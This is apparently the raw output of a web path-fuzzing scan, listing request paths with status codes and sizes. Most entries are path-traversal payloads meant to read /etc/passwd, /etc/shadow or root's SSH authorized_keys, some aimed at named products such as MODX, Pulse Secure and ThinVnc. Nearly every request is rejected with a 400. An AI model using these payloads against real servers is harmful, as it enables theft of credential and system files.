/.well-known/acme-challenge/dtfy (Status: 530) [Size: 6206]
/%2e%2e//google.com   (Status: 400) [Size: 155]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 155]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 155]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 155]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 155]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 155]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 155]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 155]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 155]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 155]
//../agc/bp.pl        (Status: 400) [Size: 155]
